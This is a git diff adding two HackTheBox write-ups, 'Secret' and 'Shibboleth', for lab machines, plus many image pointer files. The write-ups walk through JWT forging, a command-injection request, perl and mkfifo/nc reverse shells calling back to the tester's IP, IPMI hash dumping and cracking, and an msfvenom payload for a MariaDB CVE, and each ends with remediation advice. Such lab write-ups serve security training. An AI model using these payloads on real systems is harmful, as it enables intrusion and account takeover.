2022-04-04 +slug: "writeup-secret-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Secret](https://app.hackthebox.com/machines/Secret) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.11.120 +``` +Three TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2p1) +- 80/tcp : web server (Nginx 1.18.0) +- 3000/tcp : Node.js + +We have a site on port 80 and Node.js on port 3000: potentially an API. Let's go see with a browser what the site looks like and if we can find any information. + +![](img/image-2.webp) + +We can see several things: already there is an API with documentation, so potentially an attack vector. But we also have the source code of the site/API, which could be used to find vulnerabilities. + +## Exploit + +First, I will try to understand how the API works with the documentation. With the help of [Postman](https://www.postman.com/) software, I will create POST/GET requests to interact with the API. Let's create an account: + +![](img/image-3.webp) + +the API returns our user name which is normal, now let's try to connect to get our TOKEN and see how it is constituted: + +![](img/image-4.webp) + +The TOKEN is of type JWT, it is a token in 3 parts encoded in Base64 : + + +```bash +eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 : +{"alg":"HS256","typ":"JWT"} + +eyJfaWQiOiI2MjBlY2Y2Y2FiMjEyYzA0NjE1YjdmZDYiLCJuYW1lIjoiYXplcnR5IiwiZW1haWwiOiJhemVydHlAYXplcnR5LmNvbSIsImlhdCI6MTY0NTEzNzg2N30 : +{"_id":"620ecf6cab212c04615b7fd6","name":"azerty","email":"azerty@azerty.com","iat":1645137867} + + +oiM2eElnf05YPc9BSq9PiP8S8KCJh7lvhjo1x-sapIM +``` +Now let's try to access the priv page, to do this we need to send a request with a headers "auth-token" which has as value our TOKEN. + +![](img/image-5.webp) + +The API returns that we are a normal user. In the documentation we notice that the admin nickname is "theadmin", which is confirmed in the source code. The user with this nickname will have admin access. + +![](img/image-6.webp) + +The problem is that the account already exists and therefore the nickname is not available when creating a new account. + +![](img/image-7.webp) + +So we will have to find a way to send a request with the admin TOKEN to have access to the priv page and then send commands to the server. I have read about the json web token exploit on the following page: + +[Hacking JSON Web Tokens (JWTs)](https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a) + +I found out that if we have the admin TOKEN (which we have thanks to the documentation) and we have the TOKEN_SECRET which is used by the server. We can deduce the TOKEN without needing to know the admin password, perfect! + +After some analysis of the source code I discover that there are two hidden files: "*.git*" and "*.env*". And if I look in the "*.env*" file, I find the following content : + + +```bash +DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web' +TOKEN_SECRET = secret +``` +Bingo, the TOKEN_SECRET is in the file, it only remains to decrypt the tocken admin with this secret on the site [JWT](https://jwt.io/) : + +![](img/image-8.webp) + +And we get the admin TOKEN, unfortunately after sending the request, the TOKEN is not recognized, there must be another TOKEN_SECRET somewhere. + +I quickly realize that there are two commits on the .env file, in the first commit there is another TOKEN : + +![](img/image-9.webp) + + +```bash +eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTE0NjU0ZDc3ZjlhNTRlMDBmMDU3NzciLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InJvb3RAZGFzaXRoLndvcmtzIiwiaWF0IjoxNjI4NzI3NjY5fQ.52W5mGLsIO2iiLpy3f1VkVavP4hOoWHxy5_0BDn9UKo +``` +I test this new TOKEN and make a request: + +![](img/image-10.webp) + +It works, I now have admin access to the API. Now let's analyze the logs page to find a exploit. + +![](img/image-11.webp) + +I realize that the page check if I am admin, then run the command "git". So if in the variable "file" I add a command after a filename, I can execute any command, for example : + + +```bash +GET http://10.10.11.120/api/logs?file=;ls /home +"80bf34c fixed typos 🎉\n0c75212 now we can view logs from server 😃\nab3e953 Added the codes\ndasith\n" +``` +After the return of the log command, the result of the "ls /home" command is here : dasith. + +Now I will try to create a reverse shell to do the privilege elevation. After opening the 1234 on my machine with the "nc" command, I use the following request to initiate the connection: + + +```bash +http://10.10.11.120/api/logs?file=;perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.14.246:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' +``` +I do a shell upgrade with the following command: + + +```bash +python3 -c 'import pty;pty.spawn("/bin/bash")' +``` +I now have a clean shell with the user dasith ! + +![](img/image-12.webp) + +Then I can get the first flag ! + + +```bash +dasith@secret:~/local-web$ cat /home/dasith/user.txt +d2afcc21f60e10127abdf051998281af +``` +## Privilege escalation + +At first I use the [linPeas](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) script, but without much success. After testing several exploits (CVE-2021-4034, Reusing Sudo Tokens, Credentials from Process Memory, ...), I resign myself to go look somewhere else. I notice that in the "/opt" folder, there is a program that I can run with root rights : "count". + +![](img/image-13.webp) + +After running it to understand how it works, I understand that the program takes a file as input and gives in return the number of characters, words, lines. It is globally equivalent to the "wc" command, but it offers the possibility to save the result in a file. After having done an analysis of the code with "gdb" without much success, I put myself in search of a solution to recover the data that program use during its execution. + +I notice that there is a second file: code.c. Potentially the source code of "count". In this file nothing special except the following line: + + +```bash +// Enable coredump generation +prctl(PR_SET_DUMPABLE, 1); +``` +After some research, this command activates the generation of log following a core dump. This log contains among other things the contents of the memory during the crash, it would be possible to recover the contents of the file being read by the program. So let's try to make a core dump during the execution of the program and analyze the logs ! + +![](img/image-14.webp) + +So I launch the program, then pause it with "CTRL+Z". I then look for the process number and generate a crash with "kill -BUS". Then i resume the execution with "fg", the program makes a Core Dump. Normally a log has been generated in "/var/log", I extract the log with "apport-unpack". And then I extract words with the command "strings": + + +```bash +apport-unpack /var/crash/_opt_count.1000.crash /tmp/log +strings /tmp/log/CoreDump +``` +![](img/image-15.webp) + +I find in the output of the command the private key of the root account ! I now can use it to connect with ssh and get the root flag of the machine: + + +```bash +chmod 600 id.root +ssh -i id.root root@10.10.11.120 +``` + +```bash +root@secret:~# cat root.txt +f1fd65e03617bbf10967424cffe1cc3c +``` +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Don't include real TOKEN in the documentation +- Take care of removing every secret or sensitive information in the source code before publish it +- Do not hard code the API admin name +- Secure the API to prevent commands from being executed on the host +- Disable logs following a core dump or at least do not allow access to a non-root user +- Do not leave the source code of a program accessible to everyone diff --git a/content/writeup-ctf/writeup-shibboleth-htb/featured.png b/content/writeup-ctf/writeup-shibboleth-htb/featured.png new file mode 100644 index 0000000..6858013 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3fa622492a98f56a836ce8136b95ee3b3ee8563613f509672439741166204eb9 +size 234376 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/featured.webp b/content/writeup-ctf/writeup-shibboleth-htb/featured.webp new file mode 100644 index 0000000..562e584 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c7a333ae3251f006a7102f73111e867cf6fb8a452a35fb93a8e9991635449070 +size 27828 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-1.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-1.png new file mode 100644 index 0000000..0f711b0 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2bd442bc5f2da8683669a9d26ebd151534bbb56ab0937f53c59ebc711ca861ad +size 36322 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-1.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-1.webp new file mode 100644 index 0000000..cc3058d --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:51453c097ddb3b25c0ca04f6506544954220f74abe02a24adb36600f62e461d1 +size 28096 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-10.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-10.png new file mode 100644 index 0000000..d9b6bdb --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8abcecd00908e7b8983541f814e9acbbab6cd98d28605f25f16bddd13d0e2ed2 +size 13561 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-10.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-10.webp new file mode 100644 index 0000000..b7db597 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:142a98029246ac8f7946da3894aaca93bd62bcf280d43977392f7982cf570525 +size 12920 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-11.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-11.png new file mode 100644 index 0000000..855f685 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bcc49e6cb4eecf23ba7b3ebee7762c443f49ef43e0ce3c3468af4b529628c885 +size 28447 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-11.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-11.webp new file mode 100644 index 0000000..07ece0b --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:acd9859ba97cb2e039fb9328e0d61688385dde789d519db5753a2f768780b360 +size 31776 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-12.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-12.png new file mode 100644 index 0000000..3d0d93b --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ce6d23cc8da70d08761a35b1fdf07ccb83a47727c15db3851ff48405d1f8f9f3 +size 22730 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-12.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-12.webp new file mode 100644 index 0000000..616f556 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:295f616c443c059dbb9061247006000de32a1cddf2de30a781ad730e5851d7d8 +size 25324 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-13.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-13.png new file mode 100644 index 0000000..615433c --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:32ca7d3a7fec5a6e54bc89c4998a397421f05db6fdefd3b6d21cbfa3bc35a148 +size 16149 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-13.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-13.webp new file mode 100644 index 0000000..0414583 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:76f23a6fcb302611b2170e7a7ff5a3495c37a00bc0457ec75e3585bc287ac367 +size 16206 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-2.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-2.png new file mode 100644 index 0000000..128121a --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:faa0d7e8839334047a52dd917e370fae3dcd49b88b5df91ba086378d85c3c42f +size 185834 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-2.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-2.webp new file mode 100644 index 0000000..33cd622 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dce79195933309b326a5127171374f7fcfaa8dedba4d02c2993af335098e4511 +size 65634 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-3.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-3.png new file mode 100644 index 0000000..fc1baa5 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:da6ed97767feafd78ac9b861220002e09693c8e266387d18b474b9603ba5b9e5 +size 74079 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-3.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-3.webp new file mode 100644 index 0000000..0f86a4e --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:62ecb722567809fbc6d456db565c41f8df892092661480d1d788c5361b35c927 +size 50800 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-4.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-4.png new file mode 100644 index 0000000..0ea654f --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1910db54678d77340c5f6b58f055eab2835555c774dabda281be6f3e5430dfdd +size 64366 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-4.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-4.webp new file mode 100644 index 0000000..3729a0a --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fb4612974f8eba8db43de209541d2aa643ca04cb14ffed697fc4fc3ac7e1e94c +size 41538 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-5.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-5.png new file mode 100644 index 0000000..b0fb831 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a80d4e2fa41c171db5dbb77a26d18f5ff5fe8becd60155bdec3f7e620cffea7a +size 12570 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-5.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-5.webp new file mode 100644 index 0000000..c1cd95d --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b4b6d49f53f6eaa43512e7be35d8118a27e7591fa7b201adc1004a6b722bb164 +size 7812 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-6.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-6.png new file mode 100644 index 0000000..e69cd3d --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6433341d966966362751b3093e6fce254d1b94698e691ea476520100fdb64b1 +size 44497 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-6.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-6.webp new file mode 100644 index 0000000..41c0d4f --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0377b4203fef0a20016440516b2b87e99afce157364e69afee3ae13247c2d3b6 +size 28530 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-7.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-7.png new file mode 100644 index 0000000..1a49427 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5666be746d3455991ca45b591bd81a911d9cc45f779b9833e543d278215bb1cd +size 37258 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-7.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-7.webp new file mode 100644 index 0000000..5e5909e --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4dfadbaa7fd00d6b4e0bf67d92dbe96869208043043e55a91cb17e7703f09fb5 +size 30834 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-8.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-8.png new file mode 100644 index 0000000..719a79d --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:560ab74931d59f44b167e086a8f30411c4888d1bf1a871a686f2c89439cadb79 +size 112627 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-8.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-8.webp new file mode 100644 index 0000000..75d1d52 --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:81f503ecc644eec71ff93e3e659bfdf22ffe9abbf304c59bc67f11db23b811d8 +size 50178 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-9.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-9.png new file mode 100644 index 0000000..f854f0f --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c26f045c84dd5b2d514b16f4222107d8d2e015ca88ee4608c4ffe1dd2b94851c +size 21375 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-9.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-9.webp new file mode 100644 index 0000000..182c30b --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cb13953646c0d4f640915eb415e4207cf661ffce819279468cea795d31f1c54b +size 13056 diff --git a/content/writeup-ctf/writeup-shibboleth-htb/index.md b/content/writeup-ctf/writeup-shibboleth-htb/index.md new file mode 100644 index 0000000..74ea50b --- /dev/null +++ b/content/writeup-ctf/writeup-shibboleth-htb/index.md @@ -0,0 +1,169 @@ +--- +title: "Writeup - Shibboleth (HTB)" +date: 2022-04-02 +slug: "writeup-shibboleth-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Shibboleth](https://app.hackthebox.com/machines/Shibboleth) machine on the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.11.124 +``` +One TCP ports are discovered: + +![](img/image-1.webp) + +- 80/tcp : HTTP web server (Apache 2.4.41) + +![](img/image-2.webp) + +## Exploit + +At first I start by making a scan of the pages of the site: + +![](img/image-3.webp) + +Then I make a scan of the subdomain: + +![](img/image-4.webp) + +I find 3 different subdomains, I add them to the `/etc/hosts`. Then I access the site `zabbix.shibboleth.htb` and I arrive on an authentication page! + +![](img/image-5.webp) + +After some research, I can't find anything in particular. So I try to do a UDP scan to see if any additional ports are open. For that I use the following command: + + +```bash +sudo nmap -sU --min-rate 5000 shibboleth.htb +``` +![](img/image-6.webp) + +The port 623/udp is open, after some research on google I find this port is used for IPMI (Intelligent Platform Management Interface). I quickly find an exploit related to this port: + +[623/UDP/TCP - IPMI - HackTricks](https://book.hacktricks.xyz/pentesting/623-udp-ipmi) + +So I launch Metasploit and I set the extension with the following commands: + + +```bash +use auxiliary/scanner/ipmi/ipmi_dumphashes +set RHOSTS shibboleth.htb +set OUTPUT_JOHN_FILE hash +``` +After a few seconds, it returns the hash of an `Administrateur` user! + + +```bash +[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:156faf2282010000498ef9d2af7763ced04cc2a26058817d46f358e7f7f1991b35fd4a73def2e04ea123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:6b18bd2fb3309ee821c2ade2e1bcc9f2a8c75519 +``` +I try to crack it with john using the following command: + + +```bash +john hash --wordlist=rockyou.txt +``` +![](img/image-7.webp) + +John finds the following password: `ilovepumkinpie1`. + +I then credit them on the previous authentication page and it works. + +![](img/image-8.webp) + +After some research I find that it is possible to execute commands by creating an item via the administration panel. For that I go on the following page: + +Configuration -> Hosts -> Item -> Create Item + +I give a name to the item then I return the following key value: + + +```bash +name: shell +key : system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.103 1234 >/tmp/f,nowait] +``` +I can now test the item with the `Get value and test` button. + +![](img/image-9.webp) + +I now have a reverse shell with the user `zabbix`. + +![](img/image-10.webp) + +I start by upgrading my shell with the following command: + + +```bash +python3 -c 'import pty; pty.spawn("/bin/bash")' +``` +Then I realize that the first flag is held by the user `ipmi-svc`. This is the same name as the port I exploited above, so I try to change the user with the same password: + + +```bash +zabbix@shibboleth:/home/ipmi-svc$ su ipmi-svc +su ipmi-svc +Password: ilovepumkinpie1 + +ipmi-svc@shibboleth:~$ cat user.txt +cat user.txt +70c2f49504f02ded92ccbef9b3c95b35 +``` +I now have access to the first flag. + +## Privilege escalation + +I start by uploading the [linPeas.sh](https://linpeas.sh) script then I run it. I notice 2 things in the result: + +- The mysql service is run by the root user +- I have access to a file with a username and password to access the database + +![](img/image-11.webp) + +So I try to connect to the database with the following command: + + +```bash +mysql -h 127.0.0.1 -u zabbix -p +``` +![](img/image-12.webp) + +The credentials work well and allow me to discover the version of the mysql database: MariaDB 10.3.25. + +After some research I find that this version is sensitive to [CVE-2021-27928](https://github.com/Al1ex/CVE-2021-27928). This CVE allows to create a reverse shell root ! + +So I start by creating a payload with the following command: + + +```bash +msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.103 LPORT=2345 -f elf-so -o exploit.so +``` +Then after uploading it to the target machine, I set the global variable wsrep\_provider with this same payload: + + +```bash +mysql -h 127.0.0.1 -u zabbix -p -e 'SET GLOBAL wsrep_provider="/tmp/exploit.so";' +``` +![](img/image-13.webp) + +I now have a reverse shell as `root` and I can get the last flag. + + +```bash +root@shibboleth:/var/lib/mysql# cat /root/root.txt +cat /root/root.txt +6e4f289fbcc6803513ffe5a5dae46b85 +``` +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Update IPMI to avoid dumps of user hashes +- Do not use the same password across multiple services +- Do not run MariaDB as root +- Update MariaDB to avoid the reverse shell exploit diff --git a/content/writeup-ctf/writeup-shocker-htb/featured.png b/content/writeup-ctf/writeup-shocker-htb/featured.png new file mode 100644 index 0000000..6fb6a20 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7bf1855209bcea6dbe3030f2ba62bd001667bf2056e6596689cb9918b761cb9 +size 384694 diff --git a/content/writeup-ctf/writeup-shocker-htb/featured.webp b/content/writeup-ctf/writeup-shocker-htb/featured.webp new file mode 100644 index 0000000..a3bdfe3 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d0e42178fca2e3762c633f9a8b5df6659d656b73b1ad8e3cd0b818adf060d97a +size 36680 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-1.png b/content/writeup-ctf/writeup-shocker-htb/img/image-1.png new file mode 100644 index 0000000..5dbcc62 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b3439dc2ace422b07b48423a0a523c9f4f8a8e101df6bef72de7e16e99f10d13 +size 34714 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-1.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-1.webp new file mode 100644 index 0000000..eab3c0e --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f825975bbe348ab538a98dd00dc0eebfc6ee1179bb937063addfa3157b19bbd2 +size 34426 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-2.png b/content/writeup-ctf/writeup-shocker-htb/img/image-2.png new file mode 100644 index 0000000..6440b5a --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3090b09708dcc43964d544c460ac0b9d5610cdf81e9d46201757279447eebd8b +size 87776 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-2.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-2.webp new file mode 100644 index 0000000..c96d6a8 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1199cdd94b66e4cea19976def683bca47223f9c18e1f8718810a4a5116284de8 +size 19818 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-3.png b/content/writeup-ctf/writeup-shocker-htb/img/image-3.png new file mode 100644 index 0000000..4cc01f5 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b039b64d3f2225f6143ac7858df5e4565d60d5b8656b4e600cfb58b4ea097a76 +size 57423 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-3.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-3.webp new file mode 100644 index 0000000..1d489e9 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a11e0d051291d45079c50c49a581ff3bedf22c5c8dc1ee125808a1b51d4af3c5 +size 60682 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-4.png b/content/writeup-ctf/writeup-shocker-htb/img/image-4.png new file mode 100644 index 0000000..629b0f7 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:026e2d11e3d0a9867c9f6b0234e92c9a6337351bc30951256b5a5c717407ea30 +size 62023 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-4.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-4.webp new file mode 100644 index 0000000..3a1974b --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3daf306376bdf524a005a106c23308b0e68b989a9b88aa94d0794db36d2c9f80 +size 56220 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-5.png b/content/writeup-ctf/writeup-shocker-htb/img/image-5.png new file mode 100644 index 0000000..06cfa66 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d03ab144c8dd1549e487d557cbfc4564c70e1da15b1cd315abb2abb0bc8c70c3 +size 56032 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-5.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-5.webp new file mode 100644 index 0000000..713f5b4 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b110685005fc831b67f1377040b6d8e9cc22f3b9a9cc445d5c9931c9a9018175 +size 46354 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-6.png b/content/writeup-ctf/writeup-shocker-htb/img/image-6.png new file mode 100644 index 0000000..fbd14f2 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ebf2734e41e05ea137dd62aa70a77eedf6d6243aab5424a69a2e8c61b8e61d7a +size 7585 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-6.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-6.webp new file mode 100644 index 0000000..65cd702 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2528d614165a82c7cd3342fe0a91e0dcb457806650c1b9b4a238f040d08802e5 +size 7832 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-7.png b/content/writeup-ctf/writeup-shocker-htb/img/image-7.png new file mode 100644 index 0000000..60c11a5 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9e448ab66ad4e004a7b19211b0639deacfab314e9286a120fae2c71dd9a01ff0 +size 16991 diff --git a/content/writeup-ctf/writeup-shocker-htb/img/image-7.webp b/content/writeup-ctf/writeup-shocker-htb/img/image-7.webp new file mode 100644 index 0000000..8ff6b78 --- /dev/null +++ b/content/writeup-ctf/writeup-shocker-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b3a93b6839bbb73270b989d589bf38cf3a9a962e72d4a38a3cc77fc2035755dd +size 20116 diff --git 